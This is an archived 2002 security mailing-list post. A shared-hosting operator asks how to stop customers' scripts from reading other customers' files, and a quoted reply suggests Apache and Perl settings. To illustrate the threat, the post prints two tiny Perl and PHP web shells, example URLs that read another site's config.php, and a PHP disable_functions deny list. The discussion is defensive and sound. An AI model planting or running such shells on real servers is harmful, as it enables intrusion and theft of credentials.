|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: § o m e 1 (some1
runbox.com)Date: Fri Jun 21 2002 - 21:35:05 CDT
hello
thanks for your replay William,
thats correct.. the proplem is not how to protect my own script from being
subverted..
the proplem is:
how to protect my Hosting server..
i have a small web hosting commpany, and i have my own server.. i dont give
any client SSH or Telnet access, some times my customers upload a PHP or
Perl script or SSI files that allow them to hack "another user" on the
server..
for example:
1- a hacker want to hack this site (www.shop.com)
first he find what hosting company shop.com use
(from the DNS for example: ns1.myHostingSite.com )
2- the hacker signup for a 12$ hoting account on my site
(www.myHostingSite.com )
after that, the hacker upload a perl or php script to his website " hack.pl
or hack.php "
example:
http://www.hackerSite.com/cgi-bin/hack.pl?cat+/home/shopcom/public_html/shop
/config.php
#!/usr/bin/perl
print("Content-type:text/html\n\n");
print("<pre>");
`$ENV{QUERY_STRING}`;
print("</pre>");
or a hack.php
example:
http://www.hackerSite.com/hack.php?cmd=cat+/home/shopcom/public_html/shop/co
nfig.php
<?
$output = `$cmd`;
echo $output;
?>
after that he update his PHPMyAdmin confg.php file with shop.com SQL
password and get every thing!
That is The Proplem
any way: for PHP i can do some controle, i edited the PHP.ini , and i add:
disable_functions = system; exec; passthru; popen; shell_exec
i want to add the function: fopen , but i cant, many scripts require that
function... guestbooks, BBs, chatScripts..
but for SSI and Perl i don't know how can i control this things..
i thought that there ware some GooD solutions (from Apache i think) for this
kind of common security troubles for web hosting commpanys
----- Original Message -----
From: William Underwood
To: webappsecsecurityfocus.com
Cc: moksha faced
Sent: Friday, June 21, 2002 7:06 PM
Subject: RE: WebHost Security
Replying to the list, as that is where the thread is...
moksha faced <adminmokshafaced.com> wrote:
>If it's a 'server-wide' setting, you could set the web
>server to disallow exec statements, like the Apache
>"IncludesNOEXEC" which permits server-side includes
>but won't allow "#exec" and "#exec CGI" type
>statements.
>
>It's still always a good idea to run "perl -T" (taint
>mode) when it's a script and if you can.
>
>Does this help?
I'm sorry, but it doesn't help me at all, as I'm not the person with
the issue. Actually, I don't think it will help the OP either, as it sounds
like he's looking not for a way to prevent his own scripts from
being subverted, but rather a way to keep customers' scripts from
compromising his server.
William
-- William Underwood wllmundrwd
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]